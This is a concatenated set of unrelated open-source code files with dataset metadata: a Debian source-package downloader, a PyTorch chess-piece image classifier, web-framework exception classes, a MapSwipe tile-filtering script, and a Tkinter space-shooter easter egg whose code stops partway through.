for entry in deb822.Deb822.iter_paragraphs(gzip.GzipFile(
fileobj=StringIO.StringIO(requests.get(url).content))):
path = entry['Directory']
dsc = None
for fp in entry['Files'].splitlines():
if fp.strip() == "":
continue
hash_, size, fid = fp.split()
if fid.endswith(".dsc"):
dsc = fid
if entry['Package'] == source and entry['Version'] == version:
dget("{archive}/{pool}/{dsc}".format(
archive=archive,
pool=path,
dsc=dsc,
))
# break
return os.path.basename(dsc)
else:
print "BALLS."
raise Exception
def main():
import sys
return aget(*sys.argv[1:])
| <filename>debile/utils/aget.py
# Copyright (c) 2012-2013 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from debile.utils import run_command
import deb822
import StringIO
import requests
import gzip
import os
SOURCE = "dists/{suite}/{section}/source/Sources.gz"
def dget(path):
out, err, ret = run_command(["dget", "-u", path])
if ret != 0:
print ret, err
raise Exception("DAMNIT; dget fucked us")
def aget(archive, suite, section, source, version):
url = "{archive}/{path}".format(
archive=archive,
path=SOURCE.format(suite=suite, section=section
))
for entry in deb822.Deb822.iter_paragraphs(gzip.GzipFile(
fileobj=StringIO.StringIO(requests.get(url).content))):
path = entry['Directory']
dsc = None
for fp in entry['Files'].splitlines():
if fp.strip() == "":
continue
hash_, size, fid = fp.split()
if fid.endswith(".dsc"):
dsc = fid
if entry['Package'] == source and entry['Version'] == version:
dget("{archive}/{pool}/{dsc}".format(
archive=archive,
pool=path,
dsc=dsc,
))
# break
return os.path.basename(dsc)
else:
print "BALLS."
raise Exception
def main():
import sys
return aget(*sys.argv[1:])
| en | 0.754242 | # Copyright (c) 2012-2013 <NAME> <<EMAIL>> # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. # break | 2.05166 | 2 |
baseline.py | Rjuhl/Chessposition-recognition | 0 | 6614043 | import numpy as np
import os
import torch
import torch.nn as nn
from torchvision import transforms
from torch.utils.data import Dataset, DataLoader
import math
from PIL import Image
from torchsummary import summary
from numpy import asarray
image_dir = "/content/Images"
SAVE_DIR = "/content/Results"
piece_dir = {}
batch_size = 128
image_size = (128, 128) # Subject to change
epochs = 50
def popPeiceDir():
for dir in os.listdir(image_dir):
if dir.startswith('.'):
continue
piece_dir[dir] = os.path.join(image_dir, dir)
popPeiceDir()
# Empty Square = 0, Pawn = 1, King = 2, Queen = 3, Rook = 4, Bishop = 5, Knight = 6
def getFilesAndLabels():
fl = []
for key in piece_dir:
if key == "Testimg" or key == "Testimg2":
continue
for file in os.listdir(piece_dir[key]):
if file.startswith('.'):
continue
label = -1
if key == "BB" or key == "WB":
label = 5
if key == "BK" or key == "WK":
label = 6
if key == "BKi" or key == "WKi":
label = 2
if key == "BP" or key == "WP":
label = 1
if key == "BQ" or key == "WQ":
label = 3
if key == "BR" or key == "WR":
label = 4
if key == "Empty":
label = 0
assert label != -1
fl.append([os.path.join(piece_dir[key], file), label])
return fl
def transformImg(img):
preproc = transforms.Compose([transforms.Grayscale(),
transforms.Resize(image_size), transforms.ToTensor(),
transforms.Normalize((0.5), (0.5))])
return preproc(img)
def getArr(image_path):
img = Image.open(image_path)
img = transformImg(img)
return img
class DataSet(Dataset):
def __init__(self, files_labels):
self.fl = files_labels
self.count = 0
def __len__(self):
return len(self.fl)
def __getitem__(self, index):
img_arr = getArr(self.fl[index][0])
#label = torch.tensor([0, 0, 0, 0, 0, 0, 0])
#label[self.fl[index][1]] = 1
label = self.fl[index][1]
return img_arr.float(), label
# Starting Image dims, Maxpooling Kernal, number of times maxpool is called in CNN, number of conv channels
def findFCFeatures(images_size, maxpooling, num_maxpool, num_channels):
x, y = images_size
mx, my = maxpooling
for i in range(num_maxpool):
x = math.floor(((x - (mx - 1) - 1) / mx) + 1)
y = math.floor(((y - (my - 1) - 1) / my) + 1)
return x * y * num_channels
def double_conv(in_channels, out_channels):
return nn.Sequential(
nn.Conv2d(in_channels, out_channels, 3, padding=1),
nn.LeakyReLU(inplace=True),
nn.Conv2d(out_channels, out_channels, 3, padding=1),
nn.LeakyReLU(inplace=True))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv_down1 = double_conv(1, 32)
self.conv_down2 = double_conv(32, 64)
self.conv_down3 = double_conv(64, 128)
self.conv_down4 = double_conv(128, 256)
self.maxpool = nn.MaxPool2d((2, 2))
self.fc1 = nn.Linear(findFCFeatures(image_size, (2, 2), 3, 256), 7)
def forward(self, x):
conv1 = self.conv_down1(x)
x = self.maxpool(conv1)
conv2 = self.conv_down2(x)
x = self.maxpool(conv2)
conv3 = self.conv_down3(x)
x = self.maxpool(conv3)
x = self.conv_down4(x)
x = x.view(-1, findFCFeatures(image_size, (2, 2), 3, 256))
x = self.fc1(x)
return x
def train(GPU=True):
data = getFilesAndLabels()
# print(data)
dataset = DataSet(data)
model = Net()
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
if GPU:
print(device)
model.to(device)
w = torch.tensor(np.array([1, 1, 1, 1, 1, 1, 1]))
loss_func = nn.CrossEntropyLoss()
tess = math.floor(len(data) * 0.2)
trss = len(data) - tess
train_subsamples, test_subsamples = torch.utils.data.random_split(range(len(data)), [trss, tess])
train_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,
num_workers=0, sampler=train_subsamples)
test_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,
num_workers=0, sampler=test_subsamples)
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
train_acc = []
test_acc = []
train_loss = []
test_loss = []
summary(model, (1, 128, 128))
for epoch in range(epochs):
model.train()
train_num_correct = 0
test_num_correct = 0
for i, (inp, label) in enumerate(train_loader):
if GPU:
inp = inp.to(device)
label = label.to(device)
optimizer.zero_grad()
cur_pre = model(inp)
loss = loss_func(cur_pre, label.long())
train_loss.append([loss, epoch])
for i in range(cur_pre.shape[0]):
if label[i] == torch.argmax(cur_pre[i]):
train_num_correct += 1
# print('ML Started')
loss.backward()
optimizer.step()
with torch.no_grad():
for i, (inp, label) in enumerate(test_loader):
if GPU:
inp = inp.to(device)
label = label.to(device)
cur_pre = model(inp)
loss = loss_func(cur_pre, label.long())
test_loss.append([loss, epoch])
for i in range(cur_pre.shape[0]):
if label[i] == torch.argmax(cur_pre[i]):
test_num_correct += 1
train_acc.append(train_num_correct / trss)
test_acc.append(test_num_correct / tess)
print(f'Finished Epoch {epoch + 1}')
print(f'Train Acc: {train_acc}')
print(f'Test Acc: {test_acc}')
print(f'Train Loss: {train_loss}')
print(f'Test Loss: {test_loss}')
train_acc = np.array(train_acc)
test_acc = np.array(test_acc)
torch.save(model.state_dict(), SAVE_DIR)
np.savetxt(os.path.join(SAVE_DIR, 'trainAcc.csv'), train_acc, delimiter=',')
np.savetxt(os.path.join(SAVE_DIR, 'testAcc.csv'), test_acc, delimiter=',')
train(GPU=True) | import numpy as np
import os
import torch
import torch.nn as nn
from torchvision import transforms
from torch.utils.data import Dataset, DataLoader
import math
from PIL import Image
from torchsummary import summary
from numpy import asarray
image_dir = "/content/Images"
SAVE_DIR = "/content/Results"
piece_dir = {}
batch_size = 128
image_size = (128, 128) # Subject to change
epochs = 50
def popPeiceDir():
for dir in os.listdir(image_dir):
if dir.startswith('.'):
continue
piece_dir[dir] = os.path.join(image_dir, dir)
popPeiceDir()
# Empty Square = 0, Pawn = 1, King = 2, Queen = 3, Rook = 4, Bishop = 5, Knight = 6
def getFilesAndLabels():
fl = []
for key in piece_dir:
if key == "Testimg" or key == "Testimg2":
continue
for file in os.listdir(piece_dir[key]):
if file.startswith('.'):
continue
label = -1
if key == "BB" or key == "WB":
label = 5
if key == "BK" or key == "WK":
label = 6
if key == "BKi" or key == "WKi":
label = 2
if key == "BP" or key == "WP":
label = 1
if key == "BQ" or key == "WQ":
label = 3
if key == "BR" or key == "WR":
label = 4
if key == "Empty":
label = 0
assert label != -1
fl.append([os.path.join(piece_dir[key], file), label])
return fl
def transformImg(img):
preproc = transforms.Compose([transforms.Grayscale(),
transforms.Resize(image_size), transforms.ToTensor(),
transforms.Normalize((0.5), (0.5))])
return preproc(img)
def getArr(image_path):
img = Image.open(image_path)
img = transformImg(img)
return img
class DataSet(Dataset):
def __init__(self, files_labels):
self.fl = files_labels
self.count = 0
def __len__(self):
return len(self.fl)
def __getitem__(self, index):
img_arr = getArr(self.fl[index][0])
#label = torch.tensor([0, 0, 0, 0, 0, 0, 0])
#label[self.fl[index][1]] = 1
label = self.fl[index][1]
return img_arr.float(), label
# Starting Image dims, Maxpooling Kernal, number of times maxpool is called in CNN, number of conv channels
def findFCFeatures(images_size, maxpooling, num_maxpool, num_channels):
x, y = images_size
mx, my = maxpooling
for i in range(num_maxpool):
x = math.floor(((x - (mx - 1) - 1) / mx) + 1)
y = math.floor(((y - (my - 1) - 1) / my) + 1)
return x * y * num_channels
def double_conv(in_channels, out_channels):
return nn.Sequential(
nn.Conv2d(in_channels, out_channels, 3, padding=1),
nn.LeakyReLU(inplace=True),
nn.Conv2d(out_channels, out_channels, 3, padding=1),
nn.LeakyReLU(inplace=True))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv_down1 = double_conv(1, 32)
self.conv_down2 = double_conv(32, 64)
self.conv_down3 = double_conv(64, 128)
self.conv_down4 = double_conv(128, 256)
self.maxpool = nn.MaxPool2d((2, 2))
self.fc1 = nn.Linear(findFCFeatures(image_size, (2, 2), 3, 256), 7)
def forward(self, x):
conv1 = self.conv_down1(x)
x = self.maxpool(conv1)
conv2 = self.conv_down2(x)
x = self.maxpool(conv2)
conv3 = self.conv_down3(x)
x = self.maxpool(conv3)
x = self.conv_down4(x)
x = x.view(-1, findFCFeatures(image_size, (2, 2), 3, 256))
x = self.fc1(x)
return x
def train(GPU=True):
data = getFilesAndLabels()
# print(data)
dataset = DataSet(data)
model = Net()
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
if GPU:
print(device)
model.to(device)
w = torch.tensor(np.array([1, 1, 1, 1, 1, 1, 1]))
loss_func = nn.CrossEntropyLoss()
tess = math.floor(len(data) * 0.2)
trss = len(data) - tess
train_subsamples, test_subsamples = torch.utils.data.random_split(range(len(data)), [trss, tess])
train_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,
num_workers=0, sampler=train_subsamples)
test_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size,
num_workers=0, sampler=test_subsamples)
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
train_acc = []
test_acc = []
train_loss = []
test_loss = []
summary(model, (1, 128, 128))
for epoch in range(epochs):
model.train()
train_num_correct = 0
test_num_correct = 0
for i, (inp, label) in enumerate(train_loader):
if GPU:
inp = inp.to(device)
label = label.to(device)
optimizer.zero_grad()
cur_pre = model(inp)
loss = loss_func(cur_pre, label.long())
train_loss.append([loss, epoch])
for i in range(cur_pre.shape[0]):
if label[i] == torch.argmax(cur_pre[i]):
train_num_correct += 1
# print('ML Started')
loss.backward()
optimizer.step()
with torch.no_grad():
for i, (inp, label) in enumerate(test_loader):
if GPU:
inp = inp.to(device)
label = label.to(device)
cur_pre = model(inp)
loss = loss_func(cur_pre, label.long())
test_loss.append([loss, epoch])
for i in range(cur_pre.shape[0]):
if label[i] == torch.argmax(cur_pre[i]):
test_num_correct += 1
train_acc.append(train_num_correct / trss)
test_acc.append(test_num_correct / tess)
print(f'Finished Epoch {epoch + 1}')
print(f'Train Acc: {train_acc}')
print(f'Test Acc: {test_acc}')
print(f'Train Loss: {train_loss}')
print(f'Test Loss: {test_loss}')
train_acc = np.array(train_acc)
test_acc = np.array(test_acc)
torch.save(model.state_dict(), SAVE_DIR)
np.savetxt(os.path.join(SAVE_DIR, 'trainAcc.csv'), train_acc, delimiter=',')
np.savetxt(os.path.join(SAVE_DIR, 'testAcc.csv'), test_acc, delimiter=',')
train(GPU=True) | en | 0.771856 | # Subject to change # Empty Square = 0, Pawn = 1, King = 2, Queen = 3, Rook = 4, Bishop = 5, Knight = 6 #label = torch.tensor([0, 0, 0, 0, 0, 0, 0]) #label[self.fl[index][1]] = 1 # Starting Image dims, Maxpooling Kernal, number of times maxpool is called in CNN, number of conv channels # print(data) # print('ML Started') | 2.370561 | 2 |
bocadillo/exceptions.py | Inconnu08/bocadillo | 0 | 6614044 | <reponame>Inconnu08/bocadillo
from http import HTTPStatus
from typing import Union
from jinja2.exceptions import TemplateNotFound as _TemplateNotFound
# Alias
TemplateNotFound = _TemplateNotFound
class HTTPError(Exception):
"""Raised when an HTTP error occurs.
You can raise this within a view or an error handler to interrupt
request processing.
"""
def __init__(self, status: Union[int, HTTPStatus]):
if isinstance(status, int):
status = HTTPStatus(status)
else:
assert isinstance(
status, HTTPStatus
), f"Expected int or HTTPStatus, got {type(status)}"
self._status = status
@property
def status_code(self) -> int:
"""Return the HTTP error's status code, i.e. 404."""
return self._status.value
@property
def status_phrase(self) -> str:
"""Return the HTTP error's status phrase, i.e. `"Not Found"`."""
return self._status.phrase
def __str__(self):
return f"{self.status_code} {self.status_phrase}"
class UnsupportedMediaType(Exception):
"""Raised when trying to use an unsupported media type."""
def __init__(self, media_type, available):
self._media_type = media_type
self._available = available
def __str__(self):
return f'{self._media_type} (available: {", ".join(self._available)})'
| from http import HTTPStatus
from typing import Union
from jinja2.exceptions import TemplateNotFound as _TemplateNotFound
# Alias
TemplateNotFound = _TemplateNotFound
class HTTPError(Exception):
"""Raised when an HTTP error occurs.
You can raise this within a view or an error handler to interrupt
request processing.
"""
def __init__(self, status: Union[int, HTTPStatus]):
if isinstance(status, int):
status = HTTPStatus(status)
else:
assert isinstance(
status, HTTPStatus
), f"Expected int or HTTPStatus, got {type(status)}"
self._status = status
@property
def status_code(self) -> int:
"""Return the HTTP error's status code, i.e. 404."""
return self._status.value
@property
def status_phrase(self) -> str:
"""Return the HTTP error's status phrase, i.e. `"Not Found"`."""
return self._status.phrase
def __str__(self):
return f"{self.status_code} {self.status_phrase}"
class UnsupportedMediaType(Exception):
"""Raised when trying to use an unsupported media type."""
def __init__(self, media_type, available):
self._media_type = media_type
self._available = available
def __str__(self):
return f'{self._media_type} (available: {", ".join(self._available)})' | en | 0.679034 | # Alias Raised when an HTTP error occurs. You can raise this within a view or an error handler to interrupt request processing. Return the HTTP error's status code, i.e. 404. Return the HTTP error's status phrase, i.e. `"Not Found"`. Raised when trying to use an unsupported media type. | 2.745303 | 3 |
src/wai/common/meta/code_repr/_error.py | waikato-datamining/wai-common | 0 | 6614045 | <filename>src/wai/common/meta/code_repr/_error.py
"""
Module containing error types for when problems occur during
handling of code representations.
"""
from typing import Any
class CodeRepresentationError(Exception):
"""
Type of error occurring when there is a problem getting the
code-representation of a value.
"""
pass
class IsNotCodeRepresentableValue(CodeRepresentationError):
"""
Error for when a value is not code-representable.
"""
def __init__(self, value: Any):
super().__init__(f"Value '{value}' is not code-representable")
class IsNotCodeRepresentableType(CodeRepresentationError):
"""
Error for when a type is not code-representable.
"""
def __init__(self, cls: type):
super().__init__(f"Type '{cls.__qualname__}' is not code-representable")
class ConflictingImports(CodeRepresentationError):
"""
Error for when combining import dictionaries and there is
more than one import under a given identifier.
"""
def __init__(self, identifier: str, import_code_1: str, import_code_2: str):
super().__init__(f"Multiple conflicting imports with name '{identifier}'\n"
f"{import_code_1}\n"
f"<->\n"
f"{import_code_2}")
| <filename>src/wai/common/meta/code_repr/_error.py
"""
Module containing error types for when problems occur during
handling of code representations.
"""
from typing import Any
class CodeRepresentationError(Exception):
"""
Type of error occurring when there is a problem getting the
code-representation of a value.
"""
pass
class IsNotCodeRepresentableValue(CodeRepresentationError):
"""
Error for when a value is not code-representable.
"""
def __init__(self, value: Any):
super().__init__(f"Value '{value}' is not code-representable")
class IsNotCodeRepresentableType(CodeRepresentationError):
"""
Error for when a type is not code-representable.
"""
def __init__(self, cls: type):
super().__init__(f"Type '{cls.__qualname__}' is not code-representable")
class ConflictingImports(CodeRepresentationError):
"""
Error for when combining import dictionaries and there is
more than one import under a given identifier.
"""
def __init__(self, identifier: str, import_code_1: str, import_code_2: str):
super().__init__(f"Multiple conflicting imports with name '{identifier}'\n"
f"{import_code_1}\n"
f"<->\n"
f"{import_code_2}")
| en | 0.857507 | Module containing error types for when problems occur during handling of code representations. Type of error occurring when there is a problem getting the code-representation of a value. Error for when a value is not code-representable. Error for when a type is not code-representable. Error for when combining import dictionaries and there is more than one import under a given identifier. | 2.523816 | 3 |
src/basic/expression_evaluator/compiler/node_traversal/__init__.py | chuanhao01/Python_Expression_Evaluator | 0 | 6614046 | <reponame>chuanhao01/Python_Expression_Evaluator
from .pre_order import PreOrder
from .in_order import InOrder
from .post_order import PostOrder | from .pre_order import PreOrder
from .in_order import InOrder
from .post_order import PostOrder | none | 1 | 1.042759 | 1 | |
mapswipe_select_tile_subset.py | JHP4911/mapswipe_utils | 1 | 6614047 | <reponame>JHP4911/mapswipe_utils
#!/usr/local/bin/python3
# mapswipe_select_tile_subset.py
# Copyright 2017 <NAME> <EMAIL>
# Project repo: https://github.com/craic/mapswipe_utils
# Released under the terms of the MIT License
# Given a directory of bing tile images and a file of tile ids,
# Copy selected tiles to the output directory
# includes an --action arg to include or exclude the list
# tilelist can be a list of :
# tile_IDs e.g. 18-146363-145067
# file names e.g. 18-146363-145067.jpg
# CSV lines where the ID is the first field
# e.g. 18-147207-144806,positive
import argparse
import sys
import os
import shutil
import re
def main():
parser = argparse.ArgumentParser(description="Select a subset of map tiles based on a file of tile IDs")
parser.add_argument('--tilelist', '-t', metavar='<tile_list_file>', required=True,
help='File of tile IDs')
parser.add_argument('--indir', '-i', metavar='<input_directory>', required=True,
help='Input Directory')
parser.add_argument('--outdir', '-o', metavar='<output_directory>', required=True,
help='Output Directory')
parser.add_argument('--action', '-a', metavar='<action>', default='include',
help='action is to include (default) or exclude the supplied tile IDs')
args = parser.parse_args()
tile_list_file = args.tilelist
input_dir = args.indir
output_dir = args.outdir
action = args.action
# Load the tile IDs
# tile ID is the first field
tile_ids = []
lines = []
with open(tile_list_file, 'rt') as f:
lines = f.read().splitlines()
# Handle various inputs - extract IDs like 18-147209-144812
tile_id_pattern = re.compile(r'^(\d+-\d+-\d+)')
for line in lines:
m = tile_id_pattern.search(line)
if m:
tile_ids.append(m.group(0))
tile_hash = {}
for tile_id in tile_ids:
tile_hash[tile_id] = 1
# create output directory if it doesn't exist
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# List the input directory and copy files if appropriate
for filename in os.listdir(input_dir):
if filename.endswith(".jpg"):
input_id = filename.replace('.jpg', '')
if input_id in tile_hash:
if action == 'include':
src = os.path.join(input_dir, filename)
dst = os.path.join(output_dir, filename)
shutil.copyfile(src, dst)
else:
if action == 'exclude':
src = os.path.join(input_dir, filename)
dst = os.path.join(output_dir, filename)
shutil.copyfile(src, dst)
main()
| #!/usr/local/bin/python3
# mapswipe_select_tile_subset.py
# Copyright 2017 <NAME> <EMAIL>
# Project repo: https://github.com/craic/mapswipe_utils
# Released under the terms of the MIT License
# Given a directory of bing tile images and a file of tile ids,
# Copy selected tiles to the output directory
# includes an --action arg to include or exclude the list
# tilelist can be a list of :
# tile_IDs e.g. 18-146363-145067
# file names e.g. 18-146363-145067.jpg
# CSV lines where the ID is the first field
# e.g. 18-147207-144806,positive
import argparse
import sys
import os
import shutil
import re
def main():
parser = argparse.ArgumentParser(description="Select a subset of map tiles based on a file of tile IDs")
parser.add_argument('--tilelist', '-t', metavar='<tile_list_file>', required=True,
help='File of tile IDs')
parser.add_argument('--indir', '-i', metavar='<input_directory>', required=True,
help='Input Directory')
parser.add_argument('--outdir', '-o', metavar='<output_directory>', required=True,
help='Output Directory')
parser.add_argument('--action', '-a', metavar='<action>', default='include',
help='action is to include (default) or exclude the supplied tile IDs')
args = parser.parse_args()
tile_list_file = args.tilelist
input_dir = args.indir
output_dir = args.outdir
action = args.action
# Load the tile IDs
# tile ID is the first field
tile_ids = []
lines = []
with open(tile_list_file, 'rt') as f:
lines = f.read().splitlines()
# Handle various inputs - extract IDs like 18-147209-144812
tile_id_pattern = re.compile(r'^(\d+-\d+-\d+)')
for line in lines:
m = tile_id_pattern.search(line)
if m:
tile_ids.append(m.group(0))
tile_hash = {}
for tile_id in tile_ids:
tile_hash[tile_id] = 1
# create output directory if it doesn't exist
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# List the input directory and copy files if appropriate
for filename in os.listdir(input_dir):
if filename.endswith(".jpg"):
input_id = filename.replace('.jpg', '')
if input_id in tile_hash:
if action == 'include':
src = os.path.join(input_dir, filename)
dst = os.path.join(output_dir, filename)
shutil.copyfile(src, dst)
else:
if action == 'exclude':
src = os.path.join(input_dir, filename)
dst = os.path.join(output_dir, filename)
shutil.copyfile(src, dst)
main() | en | 0.674702 | #!/usr/local/bin/python3 # mapswipe_select_tile_subset.py # Copyright 2017 <NAME> <EMAIL> # Project repo: https://github.com/craic/mapswipe_utils # Released under the terms of the MIT License # Given a directory of bing tile images and a file of tile ids, # Copy selected tiles to the output directory # includes an --action arg to include or exclude the list # tilelist can be a list of : # tile_IDs e.g. 18-146363-145067 # file names e.g. 18-146363-145067.jpg # CSV lines where the ID is the first field # e.g. 18-147207-144806,positive # Load the tile IDs # tile ID is the first field # Handle various inputs - extract IDs like 18-147209-144812 # create output directory if it doesn't exist # List the input directory and copy files if appropriate | 2.988113 | 3 |
easter_egg.py | Robot-Inventor/ORIZIN_Agent | 0 | 6614048 | <filename>easter_egg.py<gh_stars>0
# -*- coding: utf8 -*-
import tkinter as tk
import time
import random
import re
import atexit
import subprocess
startMessage = True
shipX = 240
shipY = 200
rivalBeam = []
rivalBeamCount = 0
beamSpeed = 400
gameOver = 0
def shutdown(event):
quit()
def autoShutdown():
quit()
def spacePressed(event):
global startMessage
if startMessage == True:
startMessage = False
gameTitle.destroy()
promptStart.destroy()
gameCanvas.create_rectangle(shipX, shipY, shipX + 20, shipY + 20, fill='red', tag='ship')
howToPlay = tk.Label(gameCanvas, text='矢印キーで左右へ', bg='black', fg='red', font=('', 13, 'bold', 'roman', 'normal', 'normal'))
howToPlay.pack(anchor=tk.NW, expand=1)
root.after(beamSpeed, moveThings)
beamSound()
changeBeamSpeed()
def leftPressed(event):
global shipX
if startMessage == False:
if shipX >= 20:
shipX -= 20
gameCanvas.delete('ship')
gameCanvas.create_rectangle(shipX, shipY, shipX + 20, shipY + 20, fill='red', tag='ship')
def rightPressed(event):
global shipX
if startMessage == False:
if shipX <= 460:
shipX += 20
gameCanvas.delete('ship')
gameCanvas.create_rectangle(shipX, shipY, shipX + 20, shipY + 20, fill='red', tag='ship')
def moveThings():
global rivalBeam
global rivalBeamCount
rivalBeamLen = int(len(rivalBeam) / 3)
corsor = 0
for num in range(rivalBeamLen):
IDPrace = corsor
XPrace = corsor + 1
YPrace = corsor + 2
corsor += 3
rivalBeamID = rivalBeam[IDPrace]
rivalBeamX = rivalBeam[XPrace]
rivalBeamY = rivalBeam[YPrace]
gameCanvas.delete(rivalBeamID)
gameCanvas.create_line(int(rivalBeamX), int(rivalBeamY) + 20, int(rivalBeamX), int(rivalBeamY) + 40, fill='yellow', tag=rivalBeamID)
rivalBeam[YPrace] = str(int(rivalBeamY) + 20)
if int(rivalBeam[YPrace]) <= 200 and int(rivalBeam[YPrace]) >= 180 and int(rivalBeam[XPrace]) >= shipX and int(rivalBeam[XPrace]) <= shipX + 20:
global gameOver
gameOver += 1
gameOver = tk.Label(gameCanvas, text='Game Over', bg='black', fg='red', font=('', 30, 'bold', 'roman', 'normal', 'normal'))
gameOver.pack(side=tk.TOP, expand=0, fill=tk.BOTH)
beamSound('/home/pi/ORIZIN_Agent/sounds/soundEffects/wav/bomb1.wav')
root.after(3000, autoShutdown)
if int(rivalBeam[YPrace]) <= 0:
rivalBeam.pop(0)
rivalBeam.pop(1)
rivalBeam.pop(2)
X = random.randrange(0, 500, 20)
gameCanvas.create_line(X, 0, X, 20, fill='yellow', tag='rivalBeam' + str(rivalBeamCount))
rivalBeam.append('rivalBeam' + str(rivalBeamCount))
rivalBeam.append(str(X))
rivalBeam.append('0')
rivalBeamCount += 1
root.after(beamSpeed, moveThings)
def playSound(soundFile):
command = 'aplay ' + soundFile
global soundPlayer
soundPlayer = subprocess.Popen(command.split())
def beamSound(soundFile='/home/pi/ORIZIN_Agent/sounds/soundEffects/wav/laser1.wav'):
command = 'aplay ' + soundFile
subprocess.Popen(command.split())
root.after(1000, beamSound)
def stopSound():
soundPlayer.terminate()
def changeBeamSpeed():
global beamSpeed
beamSpeed -= 2
root.after(300, changeBeamSpeed)
atexit.register(stopSound)
root = tk.Tk()
root.title('ORIZIN Easter Egg')
root.geometry("500x300")
root.bind('<Control-q>', shutdown)
root.bind('<Left>', leftPressed)
root.bind('<Right>', rightPressed)
root.bind('<space>', spacePressed)
playSound('/home/pi/ORIZIN_Agent/sounds/musics/wav/natsuhasummer.wav')
gameCanvas = tk.Canvas(root, bg='black')
gameCanvas.pack(anchor=tk.NW, expand=1, fill=tk.BOTH)
gameTitle = tk.Label(gameCanvas, text='Space Battleship Game', bg='black', fg='red', font=('', 30, 'bold', 'roman', 'normal', 'normal'))
gameTitle.pack(expand=0, fill=tk.BOTH)
promptStart = tk.Label(gameCanvas, text='スペースキーを押してスタート', bg='black', fg='red', font=('', 15, 'bold', 'roman', 'normal', 'normal'))
promptStart.pack(anchor=tk.NW, expand=1, fill=tk.BOTH)
root.mainloop()
| <filename>easter_egg.py<gh_stars>0
# -*- coding: utf8 -*-
import tkinter as tk
import time
import random
import re
import atexit
import subprocess
startMessage = True
shipX = 240
shipY = 200
rivalBeam = []
rivalBeamCount = 0
beamSpeed = 400
gameOver = 0
def shutdown(event):
quit()
def autoShutdown():
quit()
def spacePressed(event):
global startMessage
if startMessage == True:
startMessage = False
gameTitle.destroy()
promptStart.destroy()
gameCanvas.create_rectangle(shipX, shipY, shipX + 20, shipY + 20, fill='red', tag='ship')
howToPlay = tk.Label(gameCanvas, text='矢印キーで左右へ', bg='black', fg='red', font=('', 13, 'bold', 'roman', 'normal', 'normal'))
howToPlay.pack(anchor=tk.NW, expand=1)
root.after(beamSpeed, moveThings)
beamSound()
changeBeamSpeed()
def leftPressed(event):
global shipX
if startMessage == False:
if shipX >= 20:
shipX -= 20
gameCanvas.delete('ship')
gameCanvas.create_rectangle(shipX, shipY, shipX + 20, shipY + 20, fill='red', tag='ship')
def rightPressed(event):
global shipX
if startMessage == False:
if shipX <= 460:
shipX += 20
gameCanvas.delete('ship')
gameCanvas.create_rectangle(shipX, shipY, shipX + 20, shipY + 20, fill='red', tag='ship')
def moveThings():
global rivalBeam
global rivalBeamCount
rivalBeamLen = int(len(rivalBeam) / 3)
corsor = 0
for num in range(rivalBeamLen):
IDPrace = corsor
XPrace = corsor + 1
YPrace = corsor + 2
corsor += 3
rivalBeamID = rivalBeam[IDPrace]
rivalBeamX = rivalBeam[XPrace]
rivalBeamY = rivalBeam[YPrace]
gameCanvas.delete(rivalBeamID)
gameCanvas.create_line(int(rivalBeamX), int(rivalBeamY) + 20, int(rivalBeamX), int(rivalBeamY) + 40, fill='yellow', tag=rivalBeamID)
rivalBeam[YPrace] = str(int(rivalBeamY) + 20)
if int(rivalBeam[YPrace]) <= 200 and int(rivalBeam[YPrace]) >= 180 and int(rivalBeam[XPrace]) >= shipX and int(rivalBeam[XPrace]) <= shipX + 20:
global gameOver
gameOver += 1
gameOver = tk.Label(gameCanvas, text='Game Over', bg='black', fg='red', font=('', 30, 'bold', 'roman', 'normal', 'normal'))
gameOver.pack(side=tk.TOP, expand=0, fill=tk.BOTH)
beamSound('/home/pi/ORIZIN_Agent/sounds/soundEffects/wav/bomb1.wav')
root.after(3000, autoShutdown)
if int(rivalBeam[YPrace]) <= 0:
rivalBeam.pop(0)
rivalBeam.pop(1)
rivalBeam.pop(2)
X = random.randrange(0, 500, 20)
gameCanvas.create_line(X, 0, X, 20, fill='yellow', tag='rivalBeam' + str(rivalBeamCount))
